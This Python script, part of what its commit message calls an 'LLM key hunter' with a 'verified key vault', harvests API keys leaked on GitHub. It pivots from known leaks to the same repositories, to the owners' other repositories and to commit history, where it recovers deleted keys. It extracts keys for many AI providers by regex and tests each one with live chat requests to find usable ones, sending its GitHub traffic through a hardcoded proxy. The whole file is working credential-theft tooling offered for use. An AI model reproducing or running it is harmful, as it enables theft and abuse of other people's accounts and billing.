- tools/scripts/llm-key-hunter: GitHub leak hunting pipeline (hunt_*, pivot miner, two-layer verify/content caches, per-provider verification) - usable_keys: verified key vault across 12 providers (deepseek, minimax, volcanoark, longcat, codingplan, zhipu free-tier, mimo, siliconflow, etc.) - .grok/skills/llm-key-hunter: operator skill for the hunt/verify/vault flow - NewAPI channel import scripts and CDP capture helpers - Result verdict buckets (excluding multi-GB blob caches and dedup dumps)
751 lines
30 KiB
Python
751 lines
30 KiB
Python
#!/usr/bin/env python3
|
|
"""Horizontal pivot miner.
|
|
|
|
From every known LEAKED key source (usable_keys/*/keys.json "source" URLs),
|
|
pivot laterally to find MORE credentials:
|
|
|
|
Stage 1 Same repo -> pull the whole git tree, fetch high-value files
|
|
(.env*, config, secrets, yaml, py, js, json, ...)
|
|
and extract all known LLM key formats.
|
|
Stage 2 Same owner -> list the owner's other public repos, fetch their
|
|
root-level dotfiles/config/README, extract keys.
|
|
Stage 3 Same file -> list commits touching the seed file, fetch each
|
|
historical blob version, recover deleted keys.
|
|
|
|
All raw blob fetches are keyed by immutable (repo,path,sha) through
|
|
ContentCache so unchanged files are never re-crawled.
|
|
"""
|
|
import argparse, json, os, re, subprocess, sys, time
|
|
import urllib.request, urllib.error, urllib.parse
|
|
from concurrent.futures import ThreadPoolExecutor, as_completed
|
|
from pathlib import Path
|
|
|
|
sys.path.insert(0, str(Path(__file__).resolve().parent))
|
|
from content_cache import ContentCache, parse_raw_url
|
|
|
|
HERE = Path(__file__).resolve().parent
|
|
VAULT = HERE / "usable_keys"
|
|
RESULTS = HERE / "results" / "pivot"
|
|
RESULTS.mkdir(parents=True, exist_ok=True)
|
|
CAND_FILE = RESULTS / "candidates.txt"
|
|
CHECKPOINT = RESULTS / "candidates.checkpoint.json"
|
|
|
|
GH_PROXY = os.environ.get("GH_PROXY", "http://114.111.19.228:3389")
|
|
UA = "Mozilla/5.0 key-hunter"
|
|
|
|
_gh = None
|
|
def gh_opener():
|
|
global _gh
|
|
if _gh is None:
|
|
if GH_PROXY:
|
|
h = urllib.request.ProxyHandler({"http": GH_PROXY, "https": GH_PROXY})
|
|
_gh = urllib.request.build_opener(h)
|
|
else:
|
|
_gh = urllib.request.build_opener()
|
|
return _gh
|
|
|
|
_direct = None
|
|
def direct_opener():
|
|
global _direct
|
|
if _direct is None:
|
|
_direct = urllib.request.build_opener(urllib.request.ProxyHandler({}))
|
|
return _direct
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# GitHub API helpers
|
|
# ---------------------------------------------------------------------------
|
|
def github_token():
|
|
tok = os.environ.get("GITHUB_TOKEN") or os.environ.get("GH_TOKEN")
|
|
if tok:
|
|
return tok
|
|
try:
|
|
out = subprocess.run(["gh", "auth", "token"], capture_output=True,
|
|
text=True, timeout=10)
|
|
if out.returncode == 0:
|
|
return out.stdout.strip()
|
|
except FileNotFoundError:
|
|
pass
|
|
hosts = Path.home() / ".config" / "gh" / "hosts.yml"
|
|
if hosts.exists():
|
|
for line in hosts.read_text().splitlines():
|
|
line = line.strip()
|
|
if line.startswith("oauth_token:"):
|
|
return line.split(":", 1)[1].strip()
|
|
return None
|
|
|
|
def gh_api(url, token, wants_json=True):
|
|
headers = {"Accept": "application/vnd.github+json", "User-Agent": "key-hunter"}
|
|
if token:
|
|
headers["Authorization"] = f"Bearer {token}"
|
|
req = urllib.request.Request(url, headers=headers)
|
|
for attempt in range(6):
|
|
try:
|
|
with gh_opener().open(req, timeout=30) as resp:
|
|
raw = resp.read()
|
|
return json.loads(raw) if wants_json else raw
|
|
except urllib.error.HTTPError as e:
|
|
if e.code in (403, 429):
|
|
reset = e.headers.get("X-RateLimit-Reset")
|
|
wait = max(int(reset) - int(time.time()), 5) if reset else 30
|
|
print(f" rate-limited, waiting {wait}s...", file=sys.stderr)
|
|
time.sleep(wait + 1)
|
|
continue
|
|
if e.code in (404, 451):
|
|
return None
|
|
try:
|
|
e.read()
|
|
except Exception:
|
|
pass
|
|
return None
|
|
except Exception as e:
|
|
print(f" network: {e}", file=sys.stderr)
|
|
time.sleep(3)
|
|
return None
|
|
|
|
def fetch_raw(url):
|
|
req = urllib.request.Request(url, headers={"User-Agent": UA})
|
|
try:
|
|
with gh_opener().open(req, timeout=20) as resp:
|
|
return resp.read().decode("utf-8", "replace")
|
|
except Exception:
|
|
return ""
|
|
|
|
def make_cached_fetch(cc, fetcher=fetch_raw):
|
|
def cached(url):
|
|
repo, sha, path = parse_raw_url(url)
|
|
if repo and sha and path:
|
|
txt = cc.get(repo, path, sha)
|
|
if txt is not None:
|
|
return txt
|
|
txt = fetcher(url)
|
|
if txt:
|
|
cc.put(repo, path, sha, txt)
|
|
return txt
|
|
return fetcher(url)
|
|
return cached
|
|
|
|
# raw.githubusercontent.com refuses a blob SHA as the ref (404); it needs a
|
|
# branch/commit ref. So fetch by branch ref but key the cache on the immutable
|
|
# blob SHA we already got from the tree/contents API.
|
|
def fetch_blob(repo, path, blob_sha, branch, cc):
|
|
if blob_sha and len(blob_sha) == 40:
|
|
hit = cc.get(repo.lower(), path, blob_sha)
|
|
if hit is not None:
|
|
return hit
|
|
ref = branch or "HEAD"
|
|
txt = fetch_raw(
|
|
f"https://raw.githubusercontent.com/{repo}/{ref}/{path}")
|
|
if txt and blob_sha and len(blob_sha) == 40:
|
|
cc.put(repo.lower(), path, blob_sha, txt)
|
|
return txt
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Key format registry. Each pattern -> provider label + (scheme, host, path,
|
|
# model, auth-header style). We extract ALL formats from every pivoted file.
|
|
# Order matters: more specific prefixes first so sk-cp-/sk-sp-/sk-cx- are not
|
|
# swallowed by a generic sk- pattern.
|
|
# ---------------------------------------------------------------------------
|
|
PROVIDERS = {}
|
|
|
|
def _reg(name, pattern, base, models=(), auth="Bearer",
|
|
chat_path="/v1/chat/completions", context=None):
|
|
PROVIDERS[name] = {
|
|
"re": re.compile(pattern),
|
|
"base": base,
|
|
"models": models,
|
|
"auth": auth,
|
|
"chat_path": chat_path,
|
|
"context": [c.lower() for c in context] if context else None,
|
|
}
|
|
|
|
# Chinese coding plans / specialist
|
|
_reg("mimo", r"sk-cx-[A-Za-z0-9]{48}", "https://api.xiaomimimo.com",
|
|
models=("mimo-v2.5", "mimo-v2"), auth="Bearer")
|
|
_reg("minimax", r"sk-cp-[A-Za-z0-9_\-]{130,}", "https://api.minimaxi.com",
|
|
models=("MiniMax-M2.5", "abab6.5s-chat"))
|
|
_reg("codingplan", r"sk-sp-[0-9a-fA-F]{32}", "https://coding.dashscope.aliyuncs.com",
|
|
models=("qwen3-coder-plus", "qwen-coder-plus"))
|
|
_reg("longcat", r"ak_[0-9A-Za-z]{29}", "https://api.longcat.chat",
|
|
models=("LongCat-2.0-Chat", "LongCat-2.0"))
|
|
_reg("zyloo", r"sk-zy-[0-9A-Za-z]{20,}", "https://api.zyloo.io",
|
|
models=("Zyloo-1",))
|
|
# Generic LLM keys
|
|
_reg("deepseek", r"sk-[a-f0-9]{32}", "https://api.deepseek.com",
|
|
models=("deepseek-chat",))
|
|
_reg("dashscope", r"sk-[a-f0-9]{32}", "https://dashscope.aliyuncs.com",
|
|
models=("qwen-plus",))
|
|
_reg("moonshot", r"sk-[A-Za-z0-9]{40,60}", "https://api.moonshot.cn",
|
|
models=("moonshot-v1-8k",))
|
|
_reg("siliconflow",r"sk-[A-Za-z0-9]{48}", "https://api.siliconflow.cn",
|
|
models=("deepseek-ai/DeepSeek-V3",))
|
|
_reg("volcanoark", r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}",
|
|
"https://ark.cn-beijing.volces.com",
|
|
models=("doubao-seed-1-6-250615",),
|
|
context=("ark_api_key", "volc_accesskey", "volc_secret",
|
|
"api_key", "apikey", "authorization", "bearer",
|
|
"ark.cn-beijing.volces.com/api/v3", "base_url"))
|
|
_reg("xunfei", r"[0-9a-f]{32}",
|
|
"https://maas-coding-api.cn-huabei-1.xf-yun.com",
|
|
models=("xunfei-coding-plan",),
|
|
context=("xf-yun.com", "xfyun", "xunfei", "iflytek",
|
|
"spark-api", "maas-coding-api"))
|
|
_reg("openai", r"sk-[A-Za-z0-9]{48,}", "https://api.openai.com",
|
|
models=("gpt-4o-mini",))
|
|
_reg("anthropic", r"sk-ant-[A-Za-z0-9_\-]{80,}", "https://api.anthropic.com",
|
|
models=("claude-3-5-haiku-latest",), auth="x-api-key",
|
|
chat_path="/v1/messages")
|
|
_reg("groq", r"gsk_[A-Za-z0-9]{52}", "https://api.groq.com",
|
|
models=("llama-3.1-8b-instant",))
|
|
_reg("github_pat", r"gh[pousr]_[A-Za-z0-9]{36,}", "")
|
|
_reg("openrouter", r"sk-or-v1-[0-9a-f]{64}", "https://openrouter.ai",
|
|
models=("openai/gpt-4o-mini",))
|
|
_reg("together", r"[0-9a-f]{64}",
|
|
"https://api.together.xyz",
|
|
models=("meta-llama/Llama-3.1-8B-Instruct-Turbo",),
|
|
context=("together.xyz", "togetherai", "together_api",
|
|
"TOGETHER_API_KEY"))
|
|
|
|
# dedup across providers: longest/most-prefixed match wins for a given span
|
|
PREF_ORDER = ["mimo", "minimax", "codingplan", "longcat", "zyloo",
|
|
"anthropic", "groq", "github_pat", "openrouter",
|
|
"siliconflow", "moonshot", "openai",
|
|
"deepseek", "dashscope", "xunfei", "volcanoark", "together"]
|
|
|
|
BLACKLIST = ("your-", "example", "placeholder", "test", "xxxx", "00000000",
|
|
"1234567890abcdef", "changeme", "dummy", "fake", "redacted")
|
|
|
|
def looks_real(k):
|
|
low = k.lower()
|
|
return not any(b in low for b in BLACKLIST)
|
|
|
|
def extract_all(text):
|
|
"""Return {provider: set(keys)} found in text, longest-prefix-wins.
|
|
|
|
For providers with a 'context' requirement (ambiguous shapes like bare
|
|
UUIDs/hex), a match is only accepted if text within +/-80 chars around
|
|
the match contains a provider assignment marker (api key / base url)."""
|
|
low = (text or "").lower()
|
|
spans = [] # (start, end, key, provider)
|
|
for prov in PREF_ORDER:
|
|
spec = PROVIDERS[prov]
|
|
markers = spec.get("context")
|
|
for m in spec["re"].finditer(text or ""):
|
|
k = m.group(0)
|
|
if not looks_real(k):
|
|
continue
|
|
if markers:
|
|
lo = max(0, m.start() - 80)
|
|
hi = min(len(low), m.end() + 80)
|
|
window = low[lo:hi]
|
|
if not any(c in window for c in markers):
|
|
continue
|
|
spans.append((m.start(), m.end(), k, prov))
|
|
# sort by start then longer-first; greedy overlap removal
|
|
spans.sort(key=lambda s: (s[0], -(s[1] - s[0])))
|
|
out = {}
|
|
occupied = []
|
|
for st, en, k, prov in spans:
|
|
if any(st < e and en > s for s, e in occupied):
|
|
continue
|
|
occupied.append((st, en))
|
|
out.setdefault(prov, set()).add(k)
|
|
return out
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Verification (direct, no proxy). Only 401 => DEAD.
|
|
# ---------------------------------------------------------------------------
|
|
def http_chat(provider, key, timeout=25):
|
|
p = PROVIDERS[provider]
|
|
if not p["base"]:
|
|
return 0, "no-endpoint"
|
|
url = p["base"].rstrip("/") + p["chat_path"]
|
|
headers = {"User-Agent": UA, "Content-Type": "application/json"}
|
|
if p["auth"] == "x-api-key":
|
|
headers["x-api-key"] = key
|
|
headers["anthropic-version"] = "2023-06-01"
|
|
else:
|
|
headers["Authorization"] = f"Bearer {key}"
|
|
model = p["models"][0] if p["models"] else "gpt-4o-mini"
|
|
if provider == "anthropic":
|
|
body = {"model": model, "max_tokens": 4,
|
|
"messages": [{"role": "user", "content": "hi"}]}
|
|
else:
|
|
body = {"model": model, "max_tokens": 1,
|
|
"messages": [{"role": "user", "content": "hi"}]}
|
|
data = json.dumps(body).encode()
|
|
req = urllib.request.Request(url, data=data, headers=headers, method="POST")
|
|
try:
|
|
with direct_opener().open(req, timeout=timeout) as resp:
|
|
return resp.getcode(), resp.read().decode("utf-8", "replace")
|
|
except urllib.error.HTTPError as e:
|
|
try:
|
|
return e.code, e.read().decode("utf-8", "replace")
|
|
except Exception:
|
|
return e.code, ""
|
|
except Exception as e:
|
|
return 0, f"network: {type(e).__name__}: {e}"
|
|
|
|
def verify(provider, key):
|
|
code, body = http_chat(provider, key)
|
|
bl = (body or "").lower()
|
|
if code == 200:
|
|
if '"choices"' in bl or '"content"' in bl or '"id"' in bl:
|
|
return "USABLE", f"chat 200 OK ({body[:80]})"
|
|
if any(x in bl for x in ("balance", "quota", "arrear", "insufficient")):
|
|
return "NO_BALANCE", f"chat: {body[:100]}"
|
|
return "USABLE", f"chat: {body[:100]}"
|
|
if code == 401:
|
|
return "DEAD", "401 unauthorized"
|
|
if code in (402, 429):
|
|
return "NO_BALANCE", f"chat HTTP {code}: {body[:100]}"
|
|
if code == 0:
|
|
return "UNKNOWN", body[:120]
|
|
return "NO_ACCESS", f"chat HTTP {code}: {body[:100]}"
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Seed collection from vault
|
|
# ---------------------------------------------------------------------------
|
|
HTML_RE = re.compile(r"https://github\.com/([^/]+/[^/]+)/blob/([^/]+)/(.*)")
|
|
|
|
def parse_source(url):
|
|
if not url:
|
|
return None, None, None, None
|
|
m = HTML_RE.search(url)
|
|
if not m:
|
|
return None, None, None, None
|
|
repo, sha, path = m.group(1), m.group(2), m.group(3)
|
|
owner = repo.split("/", 1)[0]
|
|
return owner, repo, sha, urllib.parse.unquote(path)
|
|
|
|
def collect_seeds():
|
|
"""Return list of (owner, repo, sha, path, vault_provider) from vault."""
|
|
seeds = []
|
|
for kf in sorted(VAULT.glob("*/keys.json")):
|
|
prov = kf.parent.name
|
|
try:
|
|
arr = json.loads(kf.read_text())
|
|
except Exception:
|
|
continue
|
|
if isinstance(arr, dict):
|
|
arr = [arr]
|
|
for entry in arr:
|
|
if not isinstance(entry, dict):
|
|
continue
|
|
o, r, s, p = parse_source(entry.get("source", ""))
|
|
if r:
|
|
seeds.append((o, r, s, p, prov))
|
|
return seeds
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Stage 1: same-repo full tree walk -> high-value files
|
|
# ---------------------------------------------------------------------------
|
|
HOT_EXT = (".env", ".env.local", ".env.production", ".env.development",
|
|
".yaml", ".yml", ".json", ".toml", ".ini", ".conf", ".config",
|
|
".py", ".js", ".ts", ".jsx", ".tsx", ".go", ".java", ".rb",
|
|
".php", ".sh", ".ps1", ".properties", ".txt", ".md", ".example",
|
|
".local", ".secret", ".cfg")
|
|
HOT_NAMES = (".env", "config", "secret", "credential", "apikey", "api_key",
|
|
"key", "token", "auth", "setting", "constant", "default",
|
|
"application", "app", "env", "private")
|
|
SKIP_DIRS = ("node_modules", ".git", "vendor", "dist", "build", "__pycache__",
|
|
".next", "target", "venv", ".venv", "site-packages", ".tox")
|
|
MAX_FILES_PER_REPO = 120
|
|
MAX_BYTES = 900_000
|
|
|
|
def is_hot(path):
|
|
low = path.lower()
|
|
base = low.rsplit("/", 1)[-1]
|
|
if any(sd + "/" in low for sd in SKIP_DIRS):
|
|
return False
|
|
if base.startswith(".env") or base.endswith(".env"):
|
|
return 3 # highest priority
|
|
if any(h in base for h in ("secret", "credential", "apikey", "api_key",
|
|
"token", "auth", "private")):
|
|
return 3
|
|
if any(h in base for h in ("config", "setting", "constant", "default",
|
|
"application", "app", "env")):
|
|
return 2
|
|
if any(low.endswith(e) for e in (".secret", ".cfg", ".ini", ".conf",
|
|
".properties", ".local", ".pem",
|
|
".key")):
|
|
return 2
|
|
if low.endswith((".yaml", ".yml", ".toml", ".json")):
|
|
return 1
|
|
if low.endswith((".py", ".js", ".ts", ".jsx", ".tsx", ".go", ".java",
|
|
".rb", ".php", ".sh", ".ps1")):
|
|
return 1
|
|
return 0
|
|
|
|
def repo_tree_paths(repo, token):
|
|
"""Use git/trees?recursive=1 on default branch; yield (prio,path,sha,branch)."""
|
|
data = gh_api(f"https://api.github.com/repos/{repo}", token)
|
|
if not data:
|
|
return
|
|
branch = data.get("default_branch", "main")
|
|
url = (f"https://api.github.com/repos/{repo}/git/trees/"
|
|
f"{branch}?recursive=1")
|
|
tree = gh_api(url, token)
|
|
if not tree or "tree" not in tree:
|
|
return
|
|
for node in tree.get("tree", []):
|
|
prio = is_hot(node.get("path", ""))
|
|
if node.get("type") == "blob" and prio:
|
|
yield prio, node["path"], node.get("sha", ""), branch
|
|
if tree.get("truncated"):
|
|
print(f" [warn] {repo} tree truncated, results partial",
|
|
file=sys.stderr)
|
|
|
|
def stage_repo(repo, token, cc, candidates, seen_files, stats,
|
|
fetch_workers=12):
|
|
scored = sorted(repo_tree_paths(repo, token),
|
|
key=lambda t: -t[0])[:MAX_FILES_PER_REPO]
|
|
jobs = []
|
|
for _prio, path, bsha, branch in scored:
|
|
key = (repo.lower(), path.lower(), str(bsha).lower())
|
|
if key in seen_files:
|
|
continue
|
|
seen_files.add(key)
|
|
jobs.append((path, bsha, branch))
|
|
|
|
def _fetch(job):
|
|
path, bsha, branch = job
|
|
return path, fetch_blob(repo, path, bsha, branch, cc)
|
|
|
|
with ThreadPoolExecutor(max_workers=fetch_workers) as ex:
|
|
for path, txt in ex.map(_fetch, jobs):
|
|
if not txt or len(txt) > MAX_BYTES:
|
|
continue
|
|
for prov, keys in extract_all(txt).items():
|
|
for k in keys:
|
|
if k not in candidates:
|
|
candidates[k] = (prov, f"{repo}/{path}")
|
|
stats["files_with_keys"] += 1
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Stage 2: same-owner other repos
|
|
# ---------------------------------------------------------------------------
|
|
def owner_repos(owner, token, max_repos=30):
|
|
for page in range(1, 3):
|
|
url = ("https://api.github.com/users/"
|
|
f"{urllib.parse.quote(owner)}/repos?per_page=100&page={page}"
|
|
"&sort=updated&type=owner")
|
|
data = gh_api(url, token)
|
|
if not data:
|
|
return
|
|
for r in data:
|
|
if r.get("fork"):
|
|
continue
|
|
name = r.get("full_name", "")
|
|
if name and name.lower().split("/", 1)[0] == owner.lower():
|
|
yield name
|
|
if len(data) < 100:
|
|
return
|
|
|
|
ROOT_HOT = (".env", ".env.local", ".env.production", "config.json",
|
|
"config.yaml", "config.yml", "config.toml", "settings.json",
|
|
"appsettings.json", "application.yml", "application.yaml",
|
|
"secrets.json", ".env.example", "README.md", ".env.sample")
|
|
|
|
def stage_owner(owner, exclude_repo, token, cc, candidates,
|
|
seen_files, stats):
|
|
nrepos = 0
|
|
for repo in owner_repos(owner, token):
|
|
if repo.lower() == exclude_repo.lower():
|
|
continue
|
|
nrepos += 1
|
|
if nrepos > 30:
|
|
break
|
|
meta = gh_api(f"https://api.github.com/repos/{repo}", token)
|
|
branch = (meta or {}).get("default_branch", "main")
|
|
url = f"https://api.github.com/repos/{repo}/contents/"
|
|
items = gh_api(url, token)
|
|
if not items:
|
|
continue
|
|
for it in items:
|
|
if not isinstance(it, dict):
|
|
continue
|
|
p = it.get("path", "")
|
|
if it.get("type") == "file" and (p.lower() in ROOT_HOT or
|
|
is_hot(p)):
|
|
bsha = it.get("sha", "")
|
|
key = (repo.lower(), p.lower(), str(bsha).lower())
|
|
if key in seen_files:
|
|
continue
|
|
seen_files.add(key)
|
|
txt = fetch_blob(repo, p, bsha, branch, cc)
|
|
if not txt or len(txt) > MAX_BYTES:
|
|
continue
|
|
for prov, keys in extract_all(txt).items():
|
|
for k in keys:
|
|
if k not in candidates:
|
|
candidates[k] = (prov, f"{repo}/HEAD/{p}")
|
|
stats["files_with_keys"] += 1
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Stage 3: per-seed-file commit history
|
|
# ---------------------------------------------------------------------------
|
|
def list_file_commits(repo, path, token, max_commits=6):
|
|
url = ("https://api.github.com/repos/" + repo + "/commits"
|
|
f"?path={urllib.parse.quote(path)}&per_page={max_commits}")
|
|
data = gh_api(url, token)
|
|
if not data:
|
|
return []
|
|
out = []
|
|
for c in data:
|
|
try:
|
|
out.append(c["sha"])
|
|
except Exception:
|
|
pass
|
|
return out
|
|
|
|
def stage_history(owner, repo, sha, path, token, cached_fetch,
|
|
candidates, seen_files, stats):
|
|
for csha in list_file_commits(repo, path, token):
|
|
url = f"https://raw.githubusercontent.com/{repo}/{csha}/{path}"
|
|
key = (repo.lower(), path.lower(), csha.lower())
|
|
if key in seen_files:
|
|
continue
|
|
seen_files.add(key)
|
|
txt = cached_fetch(url)
|
|
if not txt or len(txt) > MAX_BYTES:
|
|
continue
|
|
for prov, keys in extract_all(txt).items():
|
|
for k in keys:
|
|
if k not in candidates:
|
|
candidates[k] = (prov, f"{repo}@{csha[:8]}/{path}")
|
|
stats["files_with_keys"] += 1
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Driver
|
|
# ---------------------------------------------------------------------------
|
|
def load_existing():
|
|
"""Keys already known in vault -> set, to skip re-verifying."""
|
|
known = set()
|
|
for kf in VAULT.glob("*/keys.json"):
|
|
try:
|
|
arr = json.loads(kf.read_text())
|
|
except Exception:
|
|
continue
|
|
if isinstance(arr, dict):
|
|
arr = [arr]
|
|
for e in arr:
|
|
if isinstance(e, dict) and e.get("key"):
|
|
known.add(e["key"])
|
|
return known
|
|
|
|
def verify_candidates(candidates, workers, use_cache=True):
|
|
from verify_cache import CachedVerifier
|
|
# group by provider
|
|
by_prov = {}
|
|
for k, (prov, src) in candidates.items():
|
|
if not PROVIDERS[prov]["base"]:
|
|
continue # no endpoint (github_pat etc) - skip chat verify
|
|
by_prov.setdefault(prov, []).append((k, src))
|
|
|
|
verdicts = {v: [] for v in ("USABLE", "NO_BALANCE", "NO_ACCESS",
|
|
"DEAD", "UNKNOWN")}
|
|
for prov, items in sorted(by_prov.items()):
|
|
print(f" [verify] {prov}: {len(items)} candidates")
|
|
def vfn(k, _prov=prov):
|
|
return verify(_prov, k)
|
|
if use_cache:
|
|
ver = CachedVerifier(f"pivot_{prov}", vfn)
|
|
ver.__enter__()
|
|
else:
|
|
ver = None
|
|
try:
|
|
with ThreadPoolExecutor(max_workers=workers) as ex:
|
|
futs = {ex.submit(ver if ver else vfn, k): (k, src)
|
|
for k, src in items}
|
|
for fut in as_completed(futs):
|
|
k, src = futs[fut]
|
|
try:
|
|
v, d = fut.result()
|
|
except Exception as e:
|
|
v, d = "UNKNOWN", str(e)
|
|
verdicts.setdefault(v, []).append((k, src, d))
|
|
if v == "USABLE":
|
|
print(f" [+] USABLE {prov} {k[:18]}... {src}")
|
|
finally:
|
|
if ver:
|
|
ver.__exit__(None, None, None)
|
|
return verdicts
|
|
|
|
def write_candidates(candidates):
|
|
with open(CAND_FILE, "w") as f:
|
|
for k, (prov, src) in sorted(candidates.items(),
|
|
key=lambda x: (x[1][0], x[0])):
|
|
f.write(f"{prov}\t{k}\t{src}\n")
|
|
|
|
def write_verdicts(verdicts):
|
|
summary = {}
|
|
for v, rows in verdicts.items():
|
|
with open(RESULTS / f"{v.lower()}.txt", "w") as f:
|
|
for k, src, d in rows:
|
|
f.write(f"{k}\t{src}\t{d}\n")
|
|
summary[v] = len(rows)
|
|
with open(RESULTS / "summary.json", "w") as f:
|
|
json.dump(summary, f, indent=2)
|
|
print("=== verdicts:", summary)
|
|
|
|
def main():
|
|
ap = argparse.ArgumentParser()
|
|
ap.add_argument("--workers", type=int, default=16)
|
|
ap.add_argument("--fetch-workers", type=int, default=12)
|
|
ap.add_argument("--no-owner", action="store_true",
|
|
help="skip stage 2 (owner repo pivot)")
|
|
ap.add_argument("--no-history", action="store_true",
|
|
help="skip stage 3 (commit history)")
|
|
ap.add_argument("--no-tree", action="store_true",
|
|
help="skip stage 1 (same-repo tree)")
|
|
ap.add_argument("--no-content-cache", action="store_true")
|
|
ap.add_argument("--no-cache", action="store_true",
|
|
help="skip verdict cache")
|
|
ap.add_argument("--verify-only", action="store_true")
|
|
ap.add_argument("--reextract", action="store_true",
|
|
help="re-extract from cached blobs with tightened "
|
|
"patterns (no network), then verify")
|
|
ap.add_argument("--max-repos", type=int, default=0,
|
|
help="limit seed repos (0=all)")
|
|
args = ap.parse_args()
|
|
|
|
token = github_token()
|
|
if not token:
|
|
print("WARNING: no GitHub token; rate limits will be tight",
|
|
file=sys.stderr)
|
|
|
|
seeds = collect_seeds()
|
|
print(f"seeds: {len(seeds)} leaked-key sources")
|
|
if args.max_repos:
|
|
seeds = seeds[:args.max_repos]
|
|
|
|
# dedup seed repos / owners
|
|
seed_repos = sorted({s[1] for s in seeds})
|
|
seed_owners = sorted({s[0] for s in seeds})
|
|
print(f" {len(seed_repos)} distinct repos, {len(seed_owners)} owners")
|
|
|
|
if args.verify_only:
|
|
cand = {}
|
|
for line in CAND_FILE.read_text().splitlines():
|
|
parts = line.split("\t")
|
|
if len(parts) == 3:
|
|
cand[parts[1]] = (parts[0], parts[2])
|
|
print(f"loaded {len(cand)} candidates from {CAND_FILE}")
|
|
verdicts = verify_candidates(cand, args.workers,
|
|
use_cache=not args.no_cache)
|
|
write_verdicts(verdicts)
|
|
return
|
|
|
|
if args.reextract:
|
|
print("[reextract] scanning cached blobs with tightened patterns")
|
|
known = load_existing()
|
|
cc = ContentCache(force=args.no_content_cache)
|
|
cc.__enter__()
|
|
candidates = {}
|
|
nfiles = 0
|
|
for repo, files in cc._data.items():
|
|
for path, versions in files.items():
|
|
for sha, ent in versions.items():
|
|
txt = ent.get("c", "") if isinstance(ent, dict) else ""
|
|
if not txt:
|
|
continue
|
|
nfiles += 1
|
|
src = f"{repo}/{path}"
|
|
for prov, keys in extract_all(txt).items():
|
|
for k in keys:
|
|
if k not in known and k not in candidates:
|
|
candidates[k] = (prov, src)
|
|
cc.__exit__(None, None, None)
|
|
print(f"[reextract] scanned {nfiles} blobs, "
|
|
f"{len(candidates)} new candidates")
|
|
write_candidates(candidates)
|
|
if candidates:
|
|
verdicts = verify_candidates(candidates, args.workers,
|
|
use_cache=not args.no_cache)
|
|
write_verdicts(verdicts)
|
|
return
|
|
|
|
known = load_existing()
|
|
print(f"already in vault: {len(known)} keys")
|
|
|
|
def save_checkpoint():
|
|
try:
|
|
tmp = str(CHECKPOINT) + ".tmp"
|
|
with open(tmp, "w") as f:
|
|
json.dump({"candidates": {k: list(v) for k, v in
|
|
candidates.items()}}, f)
|
|
os.replace(tmp, CHECKPOINT)
|
|
except Exception as e:
|
|
print(f" [warn] checkpoint failed: {e}", file=sys.stderr)
|
|
|
|
candidates = {}
|
|
if CHECKPOINT.exists() and not args.no_cache:
|
|
try:
|
|
ch = json.loads(CHECKPOINT.read_text())
|
|
for k, v in ch.get("candidates", {}).items():
|
|
candidates[k] = tuple(v)
|
|
print(f"resumed {len(candidates)} candidates from checkpoint")
|
|
except Exception:
|
|
pass
|
|
stats = {"files_with_keys": 0}
|
|
cc = ContentCache(force=args.no_content_cache)
|
|
with cc:
|
|
cf = make_cached_fetch(cc)
|
|
seen_files = set()
|
|
|
|
# Stage 1: same repo tree
|
|
if not args.no_tree:
|
|
print(f"[stage 1] same-repo tree walk ({len(seed_repos)} repos)")
|
|
for i, repo in enumerate(seed_repos, 1):
|
|
stage_repo(repo, token, cc, candidates, seen_files, stats,
|
|
fetch_workers=args.fetch_workers)
|
|
if i % 5 == 0:
|
|
save_checkpoint()
|
|
if i % 10 == 0:
|
|
print(f" {i}/{len(seed_repos)} repos, "
|
|
f"{len(candidates)} candidates", flush=True)
|
|
|
|
# Stage 2: owner other repos
|
|
if not args.no_owner:
|
|
print(f"[stage 2] owner pivot ({len(seed_owners)} owners)")
|
|
repo_owner = {s[1]: s[0] for s in seeds}
|
|
for i, repo in enumerate(seed_repos, 1):
|
|
owner = repo_owner.get(repo, repo.split("/", 1)[0])
|
|
stage_owner(owner, repo, token, cc, candidates,
|
|
seen_files, stats)
|
|
time.sleep(1.0) # smooth request burst vs secondary rate limit
|
|
if i % 5 == 0:
|
|
save_checkpoint()
|
|
if i % 10 == 0:
|
|
print(f" {i}/{len(seed_repos)} owners, "
|
|
f"{len(candidates)} candidates", flush=True)
|
|
|
|
# Stage 3: commit history per seed file
|
|
if not args.no_history:
|
|
print(f"[stage 3] commit history ({len(seeds)} seed files)")
|
|
for i, (owner, repo, sha, path, prov) in enumerate(seeds, 1):
|
|
stage_history(owner, repo, sha, path, token, cf,
|
|
candidates, seen_files, stats)
|
|
if i % 25 == 0:
|
|
save_checkpoint()
|
|
print(f" {i}/{len(seeds)} files, "
|
|
f"{len(candidates)} candidates", flush=True)
|
|
save_checkpoint()
|
|
|
|
# strip keys already known
|
|
new_cand = {k: v for k, v in candidates.items() if k not in known}
|
|
print(f"[done] {len(candidates)} total extracted, "
|
|
f"{len(new_cand)} new (not in vault); "
|
|
f"{stats['files_with_keys']} files yielded keys")
|
|
write_candidates(new_cand)
|
|
|
|
if new_cand:
|
|
verdicts = verify_candidates(new_cand, args.workers,
|
|
use_cache=not args.no_cache)
|
|
write_verdicts(verdicts)
|
|
else:
|
|
print("no new candidates to verify")
|
|
|
|
if __name__ == "__main__":
|
|
main()
|